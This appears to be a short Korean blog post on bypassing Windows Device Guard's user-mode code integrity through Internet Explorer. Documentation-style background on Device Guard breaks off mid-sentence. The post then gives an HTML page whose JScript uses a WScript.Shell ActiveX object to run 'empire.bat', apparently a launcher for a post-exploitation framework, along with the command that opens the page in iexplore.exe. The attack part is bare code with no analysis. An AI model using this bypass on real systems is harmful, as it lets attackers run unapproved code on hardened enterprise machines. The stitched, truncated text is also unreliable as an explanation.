
Internet Explorer에서 UMCI 우회 기능
Windows Defender Device Guard는 엔터프라이즈 관련 하드웨어 및 소프트웨어 보안 기능의 조합으로, 함께 구성하면 사용자가 코드 무결성 정책에서 정의한 신뢰할 수 있는 애플리케이션만 실행할 수 있도록 장치를 잠급니다. 신뢰할 수 없는 앱은 실행할 수 없습니다. 기본 요구 사항을 충족하는 하드웨어를 사용하면 공격자가 Windows 커널을 제어하더라도 악성 실행 코드를 실행할 가능성이 훨씬 줄어듭니다. 적절한 하드웨어를 사용하면 Windows Defender Device Guard는 Windows 10(Enterprise 및 Education 데스크탑 SKU와 모든 Server SKU에서 사용 가능)의 새로운 가상화 기반 보안을 사용하여 코드 무결성 서비스를 Microsoft Windows 커널 자체로부터 격리할 수 있습니다. 이 경우 코드 무결성 서비스는 Windows 하이퍼바이저로 보호되는 컨테이너에서 커널과 함께 실행됩니다. 이 가이드는 Windows Defender Device Guard의 개별 기능과 이를 계획, 구성 및 배포하는 방법을 설명합니다. 여기에는 다음이 포함됩니다.
UMCI는 승인되지 않은 바이너리가 실행되는 것을 방지하고, Windows Scripting Host를 제한하며, PowerShell을 제한된 언어 모드로 설정합니다. 이는 시스템에서 코드 실행을 얻는 것을 상당히 어렵게 만듭니다. 이 게시물은
======================================================================||>
코드 우회 시연을 시작합니다
======================================================================||>
<html>
<body>
<script type="text/jscript">
var r = new ActiveXObject("WScript.Shell").Run("empire.bat");
</script>
</body>
</html>
======================================================================||>
PS:> C:\Users\Homjxie> cmd /C "C:\Program Files\Internet Explorer\iexplore.exe " "C:\Users\Homjxie\Desktop\Homjxie.html"
======================================================================||>

======================================================================||> ======================================================================||>